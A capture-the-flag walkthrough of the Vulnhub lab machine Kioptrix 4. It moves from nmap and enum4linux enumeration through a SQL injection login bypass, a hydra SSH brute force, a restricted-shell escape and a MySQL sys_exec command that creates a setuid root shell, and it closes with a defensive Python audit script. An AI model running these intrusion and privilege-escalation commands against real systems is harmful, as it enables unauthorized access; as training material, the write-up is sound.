Kioptrix Level 1.3 4

Vulnhub virtual machine. On the path to OSCP, this box offered enumeration of services with enum4linux and credential extraction via SQL injection. The main escalation occurs from within MySQL by abusing the sys_exec user-defined function while the database server runs as root. This was a well-rounded, well-crafted box.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Locate VM on network

netdiscover -r 192.168.56.0/24

Enumeration

Nmap Scan

nmap -sV -sC -oA nmap/kio4 192.168.56.106

Of note: the standard SSH port is open, an Apache web server on HTTP with PHP/5.2.4, Samba on NetBIOS leaking the workgroup WORKGROUP, and NSE script results yielding potential doorways into the network.

Searchsploit

Performing a quick search for vulnerabilities based on the information from nmap:

searchsploit php 5.2.4

Nothing quite usable.

searchsploit samba 3.x

A few interesting finds for Samba.

Investigate the HTTP server: navigate to 192.168.56.106

Interesting login page

Checking the source:

Discovered that the application is using a ‘checklogin.php’ page to validate credentials.

Perform SQL injection; entered username: admin' OR '1=1--

Returned “wrong username”… there might be content filtering occurring.

Perform enumeration of Samba with enum4linux:

enum4linux 192.168.56.106

The Samba version has no public vulnerabilities, but we did discover users.

Users: nobody, robert, root, john, and loneferret

Brute-force SSH (hydra): added the list of users to a file named ‘users’.

hydra -L users -P /usr/share/wordlists/rockyou.txt -t 4 192.168.56.106 ssh -vv

Hydra was not able to break in through the front door. Time to head back to the HTTP server.

Noticing that during the web login it prompted that I was not the correct user with my SQL injection. Let's try to repeat with the usernames discovered.

SQL injection, part deux. Username: john Password: ' or 1=1 --

Well, that's an improvement: a logout button.

Username: robert Password: ' or 1=1 --

Bingo-bango! We have a username and password.

Username robert
Password ADGAdsafdfwt4gadfga==

Quickly, on to SSH.

Remote Access/SSH

Let the enumeration begin:

sudo -l

uname -a

which python

cd /

well that escalated quickly…

Escaping the restricted shell:

echo os.system("/bin/bash")

Escaped!

Let's see what's on this web server.

You know what I want:

cat checklogin.php

We discovered the MySQL database username and password. Not impressed by this administrator's choice of passwords.

MySQL server enumeration

mysql -u root -p

Investigating:

SHOW DATABASES;

use members;
select * from members;

Acquired another password, for john.

id  username  password
1   john      MyNameIsJohn
2   robert    ADGAdsafdfwt4gadfga==

MySQL is running as root, just the avenue we can use to priv-esc.

Priv-Esc

Using MySQL to give us a nice entryway to root:

mysql> use mysql;
show tables;

select * from func;

Root

select sys_exec('cp /bin/sh /tmp/shell; chown root /tmp/shell; chgrp root /tmp/shell; chmod u+s /tmp/shell');

mysql> \! /tmp/shell

Bring me the root!
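The root path on this box needs two misconfigurations at once: mysqld running as root and the lib_mysqludf_sys shell functions registered in mysql.func. Below is an added audit helper (my own example, not part of the original walkthrough) that flags both from text an administrator can capture offline; the column names and sample rows are constructed, and "mariadbd" is included as an assumption about newer installs.

```python
"""Defensive audit of the MySQL weaknesses this box relies on: mysqld running as
root and a shell-executing UDF (sys_exec/sys_eval) registered in mysql.func."""

# UDF names exported by lib_mysqludf_sys that run host commands.
SHELL_UDFS = {"sys_exec", "sys_eval"}


def mysqld_runs_as_root(ps_output: str) -> bool:
    """Parse `ps -eo user,comm` output; True if a mysqld/mariadbd row is owned by root."""
    for line in ps_output.splitlines():
        cols = line.split()
        if len(cols) >= 2 and cols[1] in ("mysqld", "mariadbd") and cols[0] == "root":
            return True
    return False


def dangerous_udfs(func_rows: str) -> list:
    """Parse the tab-separated output (header included) of
    `mysql -B -e "SELECT name, dl FROM mysql.func"` and return the
    (name, library) pairs that can execute OS commands."""
    hits = []
    for line in func_rows.splitlines()[1:]:  # skip the header row
        if "\t" not in line:
            continue
        name, dl = line.split("\t", 1)
        if name.lower() in SHELL_UDFS or "lib_mysqludf_sys" in dl:
            hits.append((name, dl))
    return hits


def assess(ps_output: str, func_rows: str) -> str:
    """Combine both checks into a single severity string."""
    as_root = mysqld_runs_as_root(ps_output)
    udfs = dangerous_udfs(func_rows)
    if as_root and udfs:
        return "critical"  # any SQL account able to call the UDF gets a root shell
    if as_root or udfs:
        return "high"
    return "ok"


# Constructed sample input mirroring what the walkthrough found on the box.
PS_SAMPLE = "USER     COMMAND\nroot     sshd\nroot     mysqld\nwww-data apache2\n"
FUNC_SAMPLE = "name\tdl\nsys_exec\tlib_mysqludf_sys.so\nsys_eval\tlib_mysqludf_sys.so\n"

if __name__ == "__main__":
    print(assess(PS_SAMPLE, FUNC_SAMPLE))  # critical
    # Fix: run mysqld as the unprivileged 'mysql' user and DROP FUNCTION sys_exec / sys_eval.
```

Either finding alone is worth a ticket; the combination is what turned a leaked web-app database password into root here.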

-exec

Further Reading/Sources:

MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux - link